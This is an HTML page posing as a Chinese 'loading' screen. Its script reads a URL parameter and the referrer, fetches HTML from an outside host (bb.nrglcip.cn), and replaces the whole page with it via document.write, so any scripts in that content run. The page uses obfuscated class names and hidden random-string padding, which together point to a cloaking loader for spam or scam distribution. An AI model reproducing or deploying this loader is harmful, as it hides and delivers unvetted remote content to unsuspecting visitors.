<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Kc8Xac {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Kc8Xac .KHQW0LnqZk {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Kc8Xac .content {
            line-height: 50px;
            text-align: center
        }

        .Kc8Xac .img {
            width: 100%
        }

        .Kc8Xac .yon0xmR {
            text-align: center
        }

        .Kc8Xac .yon0xmR span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Kc8Xac .yon0xmR span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Kc8Xac .yon0xmR span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Kc8Xac .yon0xmR span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Kc8Xac .yon0xmR span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Kc8Xac .yon0xmR span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Kc8Xac .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function eikEjsSQWm(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var P0v9S = eikEjsSQWm('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ P0v9S +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ P0v9S +".html?a=share";
		}
		
        JECV4Z=url+"#"+new Date().getTime();
        JECV4Z && function() {
            $.get(JECV4Z, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >D1jO1mS4fIZAPo6qoYekz8ZSveL5oT05J782YER6NolF4VBMOe3II2tgkmWiNrmK99IRiPrPIClVAHDQ6HNQE7Sb</b>
<span style='display:none'>upJn52GvgYi59oCnVIVFgbZjVY6PDWxWO923NK9g0lpUymRBJvuNmVgWWXDy2ZV</span>
<span style='display:none'>upJn52GvgYi59oCnVIVFgbZjVY6PDWxWO923NK9g0lpUymRBJvuNmVgWWXDy2ZV</span>
<ul style='display:none' >nRBIBVtbswLgIyV2KcFHMgOFAOpEcfM0EcjFzCsebwZPxZNr1e5maPgMUdkRkslc8</ul><div class="Kc8Xac">
    <div class="KHQW0LnqZk">
        <div class="yon0xmR">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<div style='display:none'>loSWdsZlrfWSeSLavoXimXGxlBF2l9I8</div>
<div style='display:none'>loSWdsZlrfWSeSLavoXimXGxlBF2l9I8</div></body>
</html>